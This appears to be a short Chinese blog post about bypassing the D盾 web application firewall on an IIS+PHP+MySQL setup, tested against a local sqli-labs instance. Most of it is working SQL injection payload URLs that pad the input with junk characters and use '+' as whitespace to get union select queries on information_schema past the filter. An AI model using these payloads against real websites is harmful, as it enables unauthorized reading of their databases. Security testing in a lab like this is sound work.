一个抽象人的小站

# BYPASS(d盾) iis+php

attack Tags: 无标签 阅读: 447

环境是iis+php5.4+mysql+d盾
sql-labs做测试

1.png

单引号直接拦截

2.png

给前面添加垃圾字符 绕过

3.png

union注入绕过

http://192.168.79.131/Less-1/?id=-1aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%27+union+select+1,2,3--+

http://192.168.79.131/Less-1/?id=-1aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%27+union+select+1,2,3 from information_schema.tables where `table_schema` like database()--+

http://192.168.79.131/Less-1/?id=-1aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%27+union+select+1,2,3 from+information_schema.tables where+`table_schema` = database()--+

4.png

其实我也有点没搞懂为什么+号可以过去 猜测可能是iis+php的原因(PHP某些特性??)
D盾绕过思路其实很简单 就是找到没有给匹配掉的mysql空白字符

报错注入绕过

5.png

基本上大同小异。

发表评论